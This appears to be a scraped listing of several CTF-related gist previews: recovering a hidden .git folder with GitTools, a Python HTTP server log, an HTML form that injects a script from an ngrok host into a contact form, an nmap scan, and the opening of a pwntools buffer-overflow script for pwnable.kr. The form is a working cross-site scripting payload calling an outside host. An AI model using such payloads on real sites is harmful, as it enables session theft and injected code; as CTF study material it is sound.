This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
THere is a hidden .git folder | |
You can use Git-tools (https://github.com/internetwache/GitTools) to download the .git folder and extract the files. | |
First dump the files using Dumper and then extract the files of each commit using Extractor. Both these tools are available in the above link. | |
Once you download the files and analyze them you can see an index.php file deleted and you can see its code as we extracted is using Extractor in the above step. | |
URI: 3e90c63922fa145442bb58d18b62af6c21717fee/index.php | |
In the index.php the login validation function is as follows, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Serving HTTP on 0.0.0.0 port 8000 ... | |
127.0.0.1 - - [22/Oct/2017 21:29:11] "GET / HTTP/1.1" 200 - | |
127.0.0.1 - - [22/Oct/2017 21:29:11] code 404, message File not found | |
127.0.0.1 - - [22/Oct/2017 21:29:11] "GET /favicon.ico HTTP/1.1" 404 - | |
127.0.0.1 - - [22/Oct/2017 21:29:40] "GET /ew.js HTTP/1.1" 200 - | |
127.0.0.1 - - [22/Oct/2017 21:30:11] "GET /ew.js HTTP/1.1" 200 - | |
127.0.0.1 - - [22/Oct/2017 21:30:12] code 404, message File not found | |
127.0.0.1 - - [22/Oct/2017 21:30:12] "GET /favicon.ico HTTP/1.1" 404 - | |
127.0.0.1 - - [22/Oct/2017 21:33:38] "GET /ew.js HTTP/1.1" 200 - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://1128152f.ngrok.io/ew.js -> redirection script | |
------------------------------------------------ | |
<!--Actual file to be run--> | |
<form id='f' action="http://bloodsuckers.world/admin/contact" method='POST'> | |
<input type="text" name="name" value="';x='"> | |
<input type="text" name="name" value="';var script = document.createElement('script'); script.src = 'http://1128152f.ngrok.io/ew.js';document.body.appendChild(script);//"> | |
<input type="text" name="message" value="hohoho"> | |
</form> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PORT STATE SERVICE REASON VERSION | |
21/tcp open ftp syn-ack ttl 128 FileZilla ftpd | |
| ftp-syst: | |
|_ SYST: UNIX emulated by FileZilla | |
| ssl-date: | |
|_ ERROR: Unable to obtain data from the target | |
53/tcp open domain syn-ack ttl 128 Microsoft DNS | |
80/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | |
|_http-server-header: Microsoft-HTTPAPI/2.0 | |
|_http-title: Not Found |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Download : http://pwnable.kr/bin/bof | |
# Download : http://pwnable.kr/bin/bof.c | |
from pwn import * | |
import struct | |
import time | |
import re | |
for i in range(0,100): | |
s = remote('pwnable.kr', 9000) |
NewerOlder